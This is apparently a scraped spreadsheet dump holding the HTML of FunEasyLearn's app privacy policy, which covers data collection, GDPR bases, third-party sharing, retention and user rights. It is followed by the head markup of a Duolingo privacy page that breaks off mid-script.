    <t>style="margin-left:10px"&gt;• Your age&lt;/span&gt;&lt;span&gt;&lt;b&gt;Application Data.&lt;/b&gt;&amp;nbsp; We also may collect the following information if you choose to provide us with access or permission:&lt;/span&gt;&lt;span&gt;&amp;nbsp;&amp;nbsp; • &lt;b&gt;Mobile Device Access.&lt;/b&gt;&amp;nbsp; We may request access or permission to certain features from your mobile device, including your mobile device's storage, media and other features. If you wish to change our access or permissions, you may do so in your device's settings.&lt;/span&gt;&lt;span&gt;&amp;nbsp;&amp;nbsp; • &lt;b&gt;Mobile Device Data.&lt;/b&gt;&amp;nbsp; We automatically collect device information (such as your mobile device ID, model, and manufacturer), operating system, version information and system configuration information, device and application identification numbers, browser type and version, hardware model Internet service provider and/or mobile carrier, and Internet Protocol (IP) address (or proxy server). We may also collect information about the phone network associated with your mobile device, your mobile device’s operating system or platform, the type of mobile device you use, your mobile device’s unique device ID, and information about the features of our App that you accessed.&lt;/span&gt;&lt;span&gt;&amp;nbsp;&amp;nbsp; • &lt;b&gt;Push Notifications.&lt;/b&gt;&amp;nbsp; We may request to send you push notifications regarding your account or certain features of the App.</t>
  </si>
  <si>
    <t>If you wish to opt out from receiving these types of communications, you may turn them off in your device's settings.&lt;/span&gt;&lt;span&gt;This information is primarily needed to maintain the security and operation of the FunEasyLearn App, for troubleshooting, and for our internal analytics and reporting purposes.&lt;/span&gt;&lt;/p&gt;&lt;p class="text-3 bold" style="font-size:24px"&gt;b. Information automatically collected&lt;/p&gt;&lt;p class="text-4"&gt;&lt;i&gt; &lt;span&gt;&lt;b&gt;Summary:&lt;/b&gt;&amp;nbsp; Some information — such as your Internet Protocol (IP) address and/or browser and device characteristics — is collected automatically when you visit our App.&lt;/span&gt;&lt;/i&gt;&lt;span&gt;We automatically collect certain information when you visit, use, or navigate the App. This information does not reveal your specific identity (like your name or contact information) but may include device and usage information, such as your IP address, browser and device characteristics, operating system, language preferences, referring URLs, device name, country, location, information about how and when you use our App, and other technical information.</t>
  </si>
  <si>
    <t>This information is primarily needed to maintain the security and operation of our App, and for our internal analytics and reporting purposes.&lt;/span&gt;&lt;span&gt;Like many businesses, we also collect information through cookies and similar technologies. The information we collect includes:&lt;/span&gt;&lt;span&gt;&amp;nbsp;&amp;nbsp; • &lt;b&gt;Log and Usage Data.&lt;/b&gt;&amp;nbsp; Log and usage data is service-related, diagnostic, usage, and performance information our servers automatically collect when you access or use our App and which we record in log files. Depending on how you interact with us, this log data may include your IP address, device information, browser type, and settings and information about your activity in the App (such as the date/time stamps associated with your usage, pages and files viewed, searches, and other actions you take such as which features you use), device event information (such as system activity, error reports (sometimes called "crash dumps"), and hardware settings).&lt;/span&gt;&lt;span&gt;&amp;nbsp;&amp;nbsp; • &lt;b&gt;Device Data.&lt;/b&gt;&amp;nbsp; We collect device data such as information about your phone, tablet, or other device you use to access the App.</t>
  </si>
  <si>
    <t>Depending on the device used, this device data may include information such as your IP address (or proxy server), device and App identification numbers, location, browser type, hardware model, Internet service provider and/or mobile carrier, operating system, and system configuration information.&lt;/span&gt;&lt;/p&gt;&lt;h3 class="text-2 bold"&gt;2.&amp;nbsp; WHAT INFORMATION DO WE COLLECT?&lt;/h3&gt;&lt;p class="text-4"&gt; &lt;i&gt; &lt;span&gt;&lt;b&gt;Summary:&lt;/b&gt;&amp;nbsp; We process your information to provide, improve, and administer our services through the App, communicate with you, for security and fraud prevention, and to comply with law. We may also process your information for other purposes with your consent.&lt;/span&gt;&lt;/i&gt;&lt;span&gt;We process your personal information for a variety of reasons, depending on how you interact with our App, including:&lt;/span&gt;&lt;span&gt;&amp;nbsp;&amp;nbsp;• &lt;b&gt;To facilitate account creation and authentication and otherwise manage user accounts.&lt;/b&gt;&amp;nbsp; We may process your information so you can create and log in to your account, as well as keep your account in working order.&lt;/span&gt;&lt;span&gt;&amp;nbsp;&amp;nbsp;• &lt;b&gt;To deliver and facilitate delivery of services to the user.&lt;/b&gt;&amp;nbsp; We may process your information to provide you with the requested service.&lt;/span&gt;&lt;span&gt;&amp;nbsp;&amp;nbsp;• &lt;b&gt;To respond to user inquiries/offer support to users.&lt;/b&gt;&amp;nbsp; We may process your information to respond to your inquiries and solve any potential issues you might have with the requested service.&lt;/span&gt;&lt;span&gt;&amp;nbsp;&amp;nbsp;• &lt;b&gt;To send administrative information to you.&lt;/b&gt;&amp;nbsp; We may process your information to send you details about our products and services, changes to our terms and policies, and other similar information.&lt;/span&gt;&lt;span&gt;&amp;nbsp;&amp;nbsp;• &lt;b&gt;To request feedback.&lt;/b&gt;&amp;nbsp; We may process your information when necessary to request feedback and to contact you about your use of our App.&lt;/span&gt;&lt;span&gt;&amp;nbsp;&amp;nbsp;• &lt;b&gt;To send you marketing and promotional communications.&lt;/b&gt;&amp;nbsp; We may process the personal information you send to us for our marketing purposes, if this is in accordance with your marketing preferences.</t>
  </si>
  <si>
    <t>You can opt out of our marketing emails at any time. &lt;/span&gt;&lt;span&gt;&amp;nbsp;&amp;nbsp;• &lt;b&gt;To protect our Services.&lt;/b&gt;&amp;nbsp; We may process your information as part of our efforts to keep our App safe and secure, including fraud monitoring and prevention.&lt;/span&gt;&lt;span&gt;&amp;nbsp;&amp;nbsp;• &lt;b&gt;To identify usage trends.&lt;/b&gt;&amp;nbsp; We may process information about how you use our App to better understand how they are being used so we can improve them.&lt;/span&gt;&lt;span&gt;&amp;nbsp;&amp;nbsp;• &lt;b&gt;To save or protect an individual's vital interest.&lt;/b&gt;&amp;nbsp; We may process your information when necessary to save or protect an individual’s vital interest, such as to prevent harm.&lt;/span&gt;&lt;span&gt;Where you have provided us with consent to use your personal information, you have the right to withdraw this consent at any time by contacting us directly or following the ‘unsubscribe’ link provided in any electronic communications you receive from us.&lt;/span&gt;&lt;/p&gt;&lt;h3 class="text-2 bold"&gt;3.&amp;nbsp; WHAT LEGAL BASES DO WE RELY ON TO PROCESS YOUR INFORMATION?&lt;/h3&gt;&lt;p class="text-4"&gt; &lt;i&gt; &lt;span&gt;&lt;b&gt;Summary:&lt;/b&gt;&amp;nbsp; We only process your personal information when we believe it is necessary and we have a valid legal reason (i.e., legal basis) to do so under applicable law, like with your consent, to comply with laws, to provide you with services to enter into or fulfill our contractual obligations, to protect your rights, or to fulfill our legitimate business interests.&lt;/span&gt;&lt;/i&gt;&lt;span&gt;</t>
  </si>
  <si>
    <t>The EU General Data Protection Regulation (GDPR) require us to explain the valid legal bases we rely on in order to process your personal information. As such, we may rely on the following legal bases to process your personal information:&lt;/span&gt;&lt;span&gt;&amp;nbsp;&amp;nbsp;• &lt;b&gt;Consent.&lt;/b&gt;&amp;nbsp; We may process your information if you have given us permission (consent) to use your personal information for a specific purpose. You can withdraw your consent at any time.</t>
  </si>
  <si>
    <t>&lt;/span&gt;&lt;span&gt;&amp;nbsp;&amp;nbsp;• &lt;b&gt;Performance of a Contract.&lt;/b&gt;&amp;nbsp; We may process your personal information when we believe it is necessary to fulfil our contractual obligations to you, including but not limited to providing our services through the App or at your request prior to entering into a contract with you.&lt;/span&gt;&lt;span&gt;&amp;nbsp;&amp;nbsp;• &lt;b&gt;Legitimate Interests.&lt;/b&gt;&amp;nbsp; We may process your information when we believe it is reasonably necessary to achieve our legitimate business interests and those interests do not outweigh your interests and fundamental rights and freedoms. &lt;/span&gt;&lt;span&gt;&amp;nbsp;&amp;nbsp;• &lt;b&gt;Legal Obligations.&lt;/b&gt;&amp;nbsp; We may process your information where we believe it is necessary for compliance with our legal obligations, such as to cooperate with a law enforcement body or regulatory agency, exercise or defend our legal rights, or disclose your information as evidence in litigation in which we are involved.&lt;/span&gt;&lt;span&gt;&amp;nbsp;&amp;nbsp;• &lt;b&gt;Vital Interests.&lt;/b&gt;&amp;nbsp; We may process your information where we believe it is necessary to protect your vital interests or the vital interests of a third party, such as situations involving potential threats to the safety of any person.&lt;/span&gt;&lt;/p&gt;&lt;h3 class="text-2 bold"&gt;4.&amp;nbsp; WHEN AND WITH WHOM DO WE SHARE YOUR PERSONAL INFORMATION?&lt;/h3&gt;&lt;p class="text-4"&gt;</t>
  </si>
  <si>
    <t>&lt;i&gt; &lt;span&gt;&lt;b&gt;Summary:&lt;/b&gt;&amp;nbsp; We may share information in specific situations described in this section and/or with the following categories of third parties.&lt;/span&gt;&lt;/i&gt;&lt;span&gt;&lt;b&gt;Vendors, Consultants, and Other Third-Party Service Providers.&lt;/b&gt;&amp;nbsp; We may share your data with third-party vendors, service providers, contractors, or agents (“third parties”) who perform services for us or on our behalf and require access to such information to do that work. Under no circumstances do we sell your personal information. We disclose only that personal information that is necessary for the third party to deliver their specific service and we take all reasonable measures to ensure they keep your information fully secure and not use it for any purpose other than the one under which it was disclosed.</t>
  </si>
  <si>
    <t>The categories of third parties we may share personal information with are as follows:&lt;/span&gt;&lt;span style="margin-left:10px;"&gt;• Data Analytics Services&lt;/span&gt;&lt;span style="margin-left:10px;"&gt;• Data Storage Service Providers&lt;/span&gt;&lt;span style="margin-left:10px;"&gt;• User Account Registration &amp; Authentication Services&lt;/span&gt;&lt;span style="margin-left:10px;"&gt;• Website / App Hosting Service Providers&lt;/span&gt;&lt;span style="margin-left:10px;"&gt;• Payment Processors&lt;/span&gt;&lt;span style="margin-left:10px;"&gt;• Communication &amp; Collaboration Tools&lt;/span&gt;&lt;span style="margin-left:10px;"&gt;• Product Engineering &amp; Design Tools&lt;/span&gt;&lt;span style="margin-left:10px;"&gt;• Performance Monitoring Tools&lt;/span&gt;&lt;span&gt;&lt;b&gt;Storage.&lt;/b&gt;&amp;nbsp; We store all data with Google Firebase that has its headquarters in San Francisco, California, United States, in compliance with the EU General Data Protection Regulation and California Consumer Privacy Act. We act as the "data controller" (under GDPR) or "business" (under CCPA) with respect to your personal information that we provide to Google in connection with your use of the App, and Google operates as a "data processor" (GDPR) or "service provider" (CCPA). You may learn more about the Privacy and Security in Firebase at &lt;a href="https://firebase.google.com/support/privacy" target="_blank" class="link"&gt;https://firebase.google.com/support/privacy&lt;/a&gt;.</t>
  </si>
  <si>
    <t>Apart from this, we do not specifically transfer any personal information to a country or territory outside EEA without screening for adequate protection and control mechanisms in accordance with the requirements prescribed under the applicable laws.&lt;/span&gt;&lt;span&gt;&lt;b&gt;Business Transfers.&lt;/b&gt;&amp;nbsp; We may share or transfer your information in connection with, or during negotiations of, any merger, sale of company assets, financing, or acquisition of all or a portion of our business to another company.&lt;/span&gt;&lt;/p&gt;&lt;h3 class="text-2 bold"&gt;5.&amp;nbsp; DO WE USE COOKIES AND OTHER TRACKING TECHNOLOGIES?&lt;/h3&gt;&lt;p class="text-4"&gt; &lt;i&gt; &lt;span&gt;&lt;b&gt;Summary:&lt;/b&gt;&amp;nbsp; We may use cookies and other tracking technologies to collect and store your information.&lt;/span&gt;&lt;/i&gt;&lt;span&gt;We may use cookies, web beacons, tracking pixels, Google Analytics and/or other tracking technologies on our App to access or store information. Most web browsers and some mobile operating systems and mobile applications include a Do-Not-Track ("DNT") feature or setting you can activate to signal your privacy preference regarding not to have data about your online browsing activities monitored and collected.</t>
  </si>
  <si>
    <t>At this stage no uniform technology standard for recognizing and implementing DNT signals has been finalized. As such, we do not currently respond to DNT browser signals or any other mechanism that automatically communicates your choice not to be tracked online. If a standard for online tracking is adopted that we must follow in the future, we will inform you about that practice in a revised version of this privacy Policy.&lt;/span&gt;&lt;/p&gt;&lt;h3 class="text-2 bold"&gt;6.&amp;nbsp; HOW LONG DO WE KEEP YOUR INFORMATION?&lt;/h3&gt;&lt;p class="text-4"&gt;</t>
  </si>
  <si>
    <t>&lt;i&gt; &lt;span&gt;&lt;b&gt;Summary:&lt;/b&gt;&amp;nbsp; We keep your information for as long as necessary to fulfil the purposes outlined in this Privacy Policy unless otherwise required by law.&lt;/span&gt;&lt;/i&gt;&lt;span&gt;We will only keep your personal information for as long as it is necessary for the purposes set out in this Privacy Policy, unless a longer retention period is required or permitted by law (such as tax, accounting, or other legal requirements). No purpose in this Privacy Policy will require us keeping your personal information for longer than the period of time in which users have an account with us. Typically, we delete user information from our databases as soon as a user deletes their account.</t>
  </si>
  <si>
    <t>When we have no ongoing legitimate business need to process your personal information, we will either delete or anonymize such information, or, if this is not possible (for example, because your personal information has been stored in backup archives), then we will securely store your personal information and isolate it from any further processing until deletion is possible.&lt;/span&gt;&lt;/p&gt;&lt;h3 class="text-2 bold"&gt;7.&amp;nbsp; HOW DO WE KEEP YOUR INFORMATION SAFE?&lt;/h3&gt;&lt;p class="text-4"&gt; &lt;i&gt; &lt;span&gt;&lt;b&gt;Summary:&lt;/b&gt;&amp;nbsp; We aim to protect your personal information through a system of organizational and technical security measures.&lt;/span&gt;&lt;/i&gt;&lt;span&gt; We have implemented appropriate and reasonable technical and organizational security measures designed to protect the security of any personal information we process.</t>
  </si>
  <si>
    <t>However, despite our safeguards and efforts to secure your information, no electronic transmission over the Internet or information storage technology can be guaranteed to be 100% secure, so we cannot promise or guarantee that hackers, cybercriminals, or other unauthorized third parties will not be able to defeat our security and improperly collect, access, steal, or modify your information. Although we will do our best to protect your personal information, transmission of personal information to and from our App is at your own risk. You should only access the App within a secure environment.</t>
  </si>
  <si>
    <t>&lt;/span&gt;&lt;/p&gt;&lt;h3 class="text-2 bold"&gt;8.&amp;nbsp; DO WE COLLECT INFORMATION FROM MINORS?&lt;/h3&gt;&lt;p class="text-4"&gt; &lt;i&gt; &lt;span&gt;&lt;b&gt;Summary:&lt;/b&gt;&amp;nbsp; We do not knowingly collect data from or market to children under 18 years of age without parent or guardian consent.&lt;/span&gt;&lt;/i&gt;&lt;span&gt;We do not knowingly solicit data from or market to children under 18 years of age. By using the App, you represent that you are at least 18 or that you are the parent or guardian of such a minor and consent to such minor dependent’s use of the App.</t>
  </si>
  <si>
    <t>If we learn that personal information from users less than 18 years of age has been collected without parent or guardian consent, we will deactivate the account and take reasonable measures to promptly delete such data from our records. If you become aware of any data we may have collected from children under age 18, please contact us at &lt;a href="/cdn-cgi/l/email-protection#46250e0c36222b002c2313042b2211732a1f1e08732401102e252b72331f747f32" class="link"&gt;&lt;span class="__cf_email__" data-cfemail="95e5e7fce3f4f6ecd5f3e0fbf0f4e6ecf9f0f4e7fbbbf6faf8"&gt;[email&amp;#160;protected]&lt;/span&gt;&lt;/a&gt;.&lt;/span&gt;&lt;/p&gt;&lt;h3 class="text-2 bold"&gt;9.&amp;nbsp; WHAT ARE YOUR PRIVACY RIGHTS?&lt;/h3&gt;&lt;p class="text-4"&gt; &lt;i&gt; &lt;span&gt;&lt;b&gt;Summary:&lt;/b&gt;&amp;nbsp; You may review, change or terminate your account and the personal information associated with that account at any time. Additionally, in some regions, such as the European Economic Area (EEA), California (USA) and Canada, you have statutory rights that allow you greater access to and control over your personal information.&lt;/span&gt;&lt;/i&gt;&lt;/p&gt;&lt;p class="text-3 bold" style="font-size:24px"&gt;a.&amp;nbsp; Your rights with respect to your account at FunEasyLearn&lt;/p&gt;&lt;p class="text-4"&gt; &lt;span&gt;If you would at any time like to review or change the information in your account or terminate your account, you can log in to your user account and update your name / email / password / profile photo.</t>
  </si>
  <si>
    <t>You may also choose to discontinue using the App altogether and delete your account on it, consequent to which we will delete your personal information from our user databases. However, we may retain some information in our files to prevent fraud, troubleshoot problems, assist with any investigations, enforce our legal terms and/or comply with applicable legal requirements.&lt;/span&gt;&lt;/p&gt;&lt;p class="text-3 bold" style="font-size:24px"&gt;b.&amp;nbsp; Your rights with respect to your personal information&lt;/p&gt;&lt;p class="text-4"&gt; &lt;span&gt;Under certain laws including but not limited to the EU General Data Protection Regulation (GDPR), California Online Privacy Protection Act (CalOPPA) and Children Online Privacy Protection Act (COPPA), you possess a number of additional rights in relation to your personal information. These rights include –&lt;/span&gt;&lt;span&gt;&amp;nbsp;&amp;nbsp;•</t>
  </si>
  <si>
    <t>The right to be informed - You have the right to be informed about how and why your personal information is being collected or processed by us.&lt;/span&gt;&lt;span&gt;&amp;nbsp;&amp;nbsp;• The right to access – You have the right to request a copy of your personal information currently being collected and/or stored by us.&lt;/span&gt;&lt;span&gt;&amp;nbsp;&amp;nbsp;• The right to rectification – You have the right to request that we correct any information you believe is inaccurate or incomplete.&lt;/span&gt;&lt;span&gt;&amp;nbsp;&amp;nbsp;•</t>
  </si>
  <si>
    <t>The right to erasure – You have the right to request that we erase your personal information, under certain conditions.&lt;/span&gt;&lt;span&gt;&amp;nbsp;&amp;nbsp;• The right to restrict processing – You have the right to request that we restrict the processing of your personal information, under certain conditions.&lt;/span&gt;&lt;span&gt;&amp;nbsp;&amp;nbsp;• The right to object to processing – You have the right to object to our processing of your personal information, under certain conditions.&lt;/span&gt;&lt;span&gt;&amp;nbsp;&amp;nbsp;•</t>
  </si>
  <si>
    <t>The right to data portability – You have the right to request that we transfer the data that we have collected to another organisation, or directly to you, under certain conditions.&lt;/span&gt;&lt;span&gt;We are committed to upholding these rights at all times. If you wish to exercise any of these rights, please send us a request that (a) provides sufficient detail to allow us to verify that you are the person about whom we have collected personal information, and (b) describes your request in sufficient detail to allow us to understand, evaluate, and respond to it as soon as possible. Please note we cannot respond to requests that do not adequately meet the above criteria.&lt;/span&gt;&lt;span&gt;As per GDPR guidelines, FunEasyLearn has a “Data Protection Officer” (DPO) who is responsible for all matters relating to privacy and data protection and they can be reached at –&lt;/span&gt;&lt;span class="d-flex"&gt;Attn: &lt;span style="text-decoration: underline; margin-left: 10px;"&gt;FELSOFT TECHNOLOGIES SRL&lt;/span&gt;&lt;/span&gt;&lt;span class="d-flex"&gt;Address: &lt;span style="text-decoration: underline; margin-left: 10px;"&gt;7/2 Teilor Street, Chisinau, Republic of Moldova&lt;/span&gt;&lt;/span&gt;&lt;span class="d-flex"&gt;Email:</t>
  </si>
  <si>
    <t>&lt;span style="text-decoration: underline; margin-left: 10px;"&gt;&lt;a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="ee9e9c87988f8d97ae889b808b8f9d97828b8f9c80c08d8183"&gt;[email&amp;#160;protected]&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;You also have the right to complain to a supervisory authority according to Article 51 of GDPR where you feel that our processing of your personal information has infringed your rights. The supervisory authority in the Republic of Moldova is the National Center for Personal Data Protection at &lt;a href="https://datepersonale.md/" target="_blank"&gt;https://datepersonale.md/&lt;/a&gt;. &lt;/span&gt;&lt;span&gt;If you have any further questions or comments about this Privacy Policy, you may email us at &lt;a href="/cdn-cgi/l/email-protection#3b5873714b5f567d515e6e79565f6c0e576263750e597c6d5358560f4e6209024f" class="link"&gt;&lt;span class="__cf_email__" data-cfemail="a4d4d6cdd2c5c7dde4c2d1cac1c5d7ddc8c1c5d6ca8ac7cbc9"&gt;[email&amp;#160;protected]&lt;/span&gt;&lt;/a&gt;.&lt;/span&gt;&lt;/p&gt;&lt;p class="text-4" style="margin-top: 30px; text-align: end;"&gt;&lt;i&gt;These Terms of Use were last updated in November 21, 2022.&lt;/i&gt;&lt;/p&gt;&lt;/div&gt;&lt;/section&gt;&lt;section style="background: #352C3F"&gt;&lt;div class="wrapper"&gt;&lt;div class="footer-3"&gt;&lt;div class="d-flex flex-wrap pages-footer-3"&gt;&lt;a class="p" href="/about"&gt;About us&lt;/a&gt;&lt;a class="p" href="/mobile"&gt;Mobile apps&lt;/a&gt;&lt;a class="p" href="/press"&gt;Press&lt;/a&gt;&lt;a class="p" href="/privacy"&gt;Privacy&lt;/a&gt;&lt;a class="p" href="/terms"&gt;Terms&lt;/a&gt;&lt;/div&gt;&lt;div class="d-flex social-media-footer-3"&gt;&lt;a href="https://www.facebook.com/FunEasyLearn" target="_blank"&gt;&lt;img src="https://www.funeasylearn.com/static/imgs/svg/fb.svg" alt="logo"/&gt;&lt;/a&gt;&lt;a href="https://www.instagram.com/funeasylearn" target="_blank"&gt;&lt;img src="https://www.funeasylearn.com/static/imgs/svg/insta.svg" alt="logo"/&gt;&lt;/a&gt;&lt;a href="https://www.youtube.com/user/FunEasyLearn" target="_blank"&gt;&lt;img src="https://www.funeasylearn.com/static/imgs/svg/yt.svg" alt="logo"/&gt;&lt;/a&gt;&lt;a href="https://www.twitter.com/FunEasyLearn" target="_blank"&gt;&lt;img src="https://www.funeasylearn.com/static/imgs/svg/tw.svg" alt="logo"/&gt;&lt;/a&gt;&lt;a href="https://www.linkedin.com/company/funeasylearn/" target="_blank"&gt;&lt;img src="https://www.funeasylearn.com/static/imgs/svg/linkedin.svg" alt="logo"/&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/section&gt;&lt;/div&gt;&lt;footer class="footer ptb-20" style="background: #15111B"&gt;&lt;div class="wrapper small"&gt;&lt;p class="text-center"&gt;© 2023 FunEasyLearn.</t>
  </si>
  <si>
    <t>All rights reserved.&lt;/p&gt;&lt;/div&gt;&lt;/footer&gt;&lt;div id="banner"&gt;&lt;div class="d-flex justify-content-between"&gt;  &lt;div class="left d-flex align-items-center"&gt;&lt;div class="close"&gt;&lt;/div&gt;&lt;img class="logo" src="https://www.funeasylearn.com/static/imgs/img/banner/logo.png" alt="FunEasyLearn bee"/&gt;&lt;div class="content"&gt;&lt;div class="h1"&gt;Install the FunEasyLearn app&lt;/div&gt;&lt;div class="star d-flex align-items-center"&gt;&lt;div&gt;4.7&lt;/div&gt;&lt;img class="stars__img" src="https://www.funeasylearn.com/static/imgs/img/banner/stars.png" alt="star"/&gt;&lt;/div&gt;&lt;img class="store" data-android="https://www.funeasylearn.com/static/imgs/img/banner/android.png" data-apple="https://www.funeasylearn.com/static/imgs/img/banner/apple.png"/&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="right d-flex align-items-center"&gt;&lt;a class="install" data-android="https://fel.page.link/android" data-apple="https://fel.page.link/ios"&gt;Install&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="pt-20 pb-10" id="cookies"&gt;&lt;div class="wrapper"&gt;&lt;div class="d-flex"&gt;&lt;img class="d-none d-md-block" src="https://www.funeasylearn.com/static/imgs/img/cookies.png" alt="Bee eating"/&gt;&lt;p class="text-4"&gt;By continuing to use this site you consent to the use of cookies in accordance with our cookie policy. &lt;a href='/privacy'  class='link'&gt;Find out more&lt;/a&gt;&lt;/p&gt;&lt;button class="close"&gt;&lt;/button&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"&gt;&lt;/script&gt;&lt;script src="https://www.funeasylearn.com/stat</t>
  </si>
  <si>
    <t>&lt;!doctype html&gt;&lt;html dir="ltr"&gt;&lt;head&gt;&lt;title&gt;Duolingo&lt;/title&gt;&lt;meta charset="utf-8"&gt;&lt;meta name="viewport" content="width=device-width,initial-scale=1,user-scalable=no"&gt;&lt;meta name="robots" content="NOODP"&gt;&lt;noscript&gt;&lt;meta http-equiv="refresh" content="0; url=/nojs/splash"&gt;&lt;/noscript&gt;&lt;meta name="apple-mobile-web-app-capable" content="yes"&gt;&lt;meta name="apple-mobile-web-app-status-bar-style" content="black"&gt;&lt;meta name="apple-mobile-web-app-title" content="Duolingo"&gt;&lt;meta name="google" content="notranslate"&gt;&lt;meta name="mobile-web-app-capable" content="yes"&gt;&lt;meta name="apple-itunes-app" content="app-id=570060128"&gt;&lt;meta name="facebook-domain-verification" content="mwudgypvvgl4fekxjk5rpk3eqg7ykt"&gt;&lt;link rel="apple-touch-icon" href="https://d35aaqx5ub95lt.cloudfront.net/images/duolingo-touch-icon2.png"&gt;&lt;link rel="icon" href="https://d35aaqx5ub95lt.cloudfront.net/favicon.ico"&gt;&lt;script src="https://cdn.cookielaw.org/scripttemplates/otSDKStub.js" data-document-language="true" charset="UTF-8" data-domain-script="55a7f100-001e-4085-87ec-1a6d522f7d67"&gt;&lt;/script&gt;&lt;script&gt;function OptanonWrapper(){}&lt;/script&gt;&lt;script async defer="defer" src="https://www.recaptcha.net/recaptcha/enterprise.js?render=6LcLOdsjAAAAAFfwGusLLnnn492SOGhsCh-uEAvI"&gt;&lt;/script&gt;&lt;link rel="manifest" href="/manifest.json"&gt;&lt;meta name="twitter:site" content="@duolingo"  /&gt;&lt;meta name="twitter:image" content="https://www.duolingo.com/images/facebook/duo200.png"  /&gt;&lt;meta name="twitter:description" content="Learn languages by playing a game.</t>
  </si>
  <si>
    <t>It's 100% free, fun, and scientifically proven to work." data-react-helmet="true" /&gt;&lt;meta name="twitter:title" content="Duolingo - Learn a language for free @duolingo"  /&gt;&lt;meta name="twitter:card" content="summary"  /&gt;&lt;meta</t>
  </si>
  <si>
    <t>property="og:url" content="https://www.duolingo.com/abc-privacy"  /&gt;&lt;meta property="og:image:height" content="630"  /&gt;&lt;meta property="og:type" content="website"  /&gt;&lt;meta</t>
  </si>
  <si>
    <t>property="og:description" content="Learn languages by playing a game. It's 100% free, fun, and scientifically proven to work." data-react-helmet="true" /&gt;&lt;meta</t>
  </si>
  <si>
    <t>property="og:image:width" content="1200"  /&gt;&lt;meta property="og:title" content="Learn a language for free"  /&gt;&lt;meta property="fb:app_id" content="234536436609303"  /&gt;&lt;meta property="og:image" content="https://www.duolingo.com/images/facebook/duo-08523a2.jpg"  /&gt;&lt;meta</t>
  </si>
  <si>
    <t>property="og:site_name" content="Duolingo"  /&gt;&lt;meta name="keywords" content="learn, spanish, german, french, portuguese, italian, english, free, lessons, course, language, study, flashcards"  /&gt;&lt;meta name="description" content="Duolingo is the world's most popular way to learn a language. It's 100% free, fun and science-based. Practice online on duolingo.com or on the apps!"</t>
  </si>
  <si>
    <t>data-react-helmet="true" /&gt;&lt;link rel="alternate" hreflang="ar" href="https://ar.duolingo.com/abc-privacy" /&gt;&lt;link rel="alternate" hreflang="bn" href="https://bn.duolingo.com/abc-privacy" /&gt;&lt;link</t>
  </si>
  <si>
    <t>rel="alternate" hreflang="cs" href="https://cs.duolingo.com/abc-privacy" /&gt;&lt;link rel="alternate" hreflang="de" href="https://de.duolingo.com/abc-privacy" /&gt;&lt;link rel="alternate" hreflang="el" href="https://el.duolingo.com/abc-privacy" /&gt;&lt;link</t>
  </si>
  <si>
    <t>rel="alternate" hreflang="en" href="https://www.duolingo.com/abc-privacy" /&gt;&lt;link rel="alternate" hreflang="es" href="https://es.duolingo.com/abc-privacy" /&gt;&lt;link rel="alternate" hreflang="fr" href="https://fr.duolingo.com/abc-privacy" /&gt;&lt;link</t>
  </si>
  <si>
    <t>rel="alternate" hreflang="hi" href="https://hi.duolingo.com/abc-privacy" /&gt;&lt;link rel="alternate" hreflang="hu" href="https://hu.duolingo.com/abc-privacy" /&gt;&lt;link rel="alternate" hreflang="id" href="https://id.duolingo.com/abc-privacy" /&gt;&lt;link</t>
  </si>
  <si>
    <t>rel="alternate" hreflang="it" href="https://it.duolingo.com/abc-privacy" /&gt;&lt;link rel="alternate" hreflang="ja" href="https://ja.duolingo.com/abc-privacy" /&gt;&lt;link rel="alternate" hreflang="ko" href="https://ko.duolingo.com/abc-privacy" /&gt;&lt;link rel="alternate" hreflang="nl" href="https://nl-nl.duolingo.com/abc-privacy" /&gt;&lt;link rel="alternate" hreflang="pl" href="https://pl.duolingo.com/abc-privacy" /&gt;&lt;link rel="alternate" hreflang="pt" href="https://pt.duolingo.com/abc-privacy" /&gt;&lt;link</t>
  </si>
  <si>
    <t>rel="alternate" hreflang="ro" href="https://ro.duolingo.com/abc-privacy" /&gt;&lt;link rel="alternate" hreflang="ru" href="https://ru.duolingo.com/abc-privacy" /&gt;&lt;link rel="alternate" hreflang="th" href="https://th.duolingo.com/abc-privacy" /&gt;&lt;link rel="alternate" hreflang="tl" href="https://tl.duolingo.com/abc-privacy" /&gt;&lt;link</t>
  </si>
  <si>
    <t>rel="alternate" hreflang="tr" href="https://tr.duolingo.com/abc-privacy" /&gt;&lt;link rel="alternate" hreflang="uk" href="https://uk.duolingo.com/abc-privacy" /&gt;&lt;link rel="alternate" hreflang="vi" href="https://vi.duolingo.com/abc-privacy" /&gt;&lt;link rel="alternate" hreflang="x-default" href="https://www.duolingo.com/abc-privacy" /&gt;&lt;link rel="alternate" hreflang="zh" href="http://www.duolingo.cn/abc-privacy" /&gt;&lt;link</t>
  </si>
  <si>
    <t>rel="canonical" href="https://www.duolingo.com/abc-privacy" id="canonical" /&gt;&lt;script&gt;window.duo={"detUiLanguages":["en","es","pt","it","fr","de","ja","zs","zt","ko","ru","hi","hu","tr"],"removeNativeAppBanner":false,"uiLanguage":"en","troubleshootingForumId":647,"oldWebUrlWhitelist":["^/comment/","^/design$","^/discussion$","^/topic/"]}&lt;/script&gt;&lt;script defer="defer" src="https://d35aaqx5ub95lt.cloudfront.net/js/manifest-adad0a37.js"&gt;&lt;/script&gt;&lt;script defer="defer" src="https://d35aaqx5ub95lt.cloudfront.net/js/features-788794a2.js"&gt;&lt;/script&gt;&lt;script&gt;"use strict";(self.webpackChunk=self.webpackChunk||[]).push([[7979],{4399:(e,o,f)=&gt;{var a=f(8044),r=f(48751),t=f(10981),d=f(9114),n=f(86798),b=f(21781);const c=new FontFace("din-round",`url(${d}) format("woff2"), url(${t}) format("woff")`,{style:"normal",weight:"500"}),w=new FontFace("din-round",`url(${r}) format("woff2"), url(${a}) format("woff")`,{style:"normal",weight:"700"}),s=new FontFace("feather",`url(${b}) format("woff2"), url(${n}) 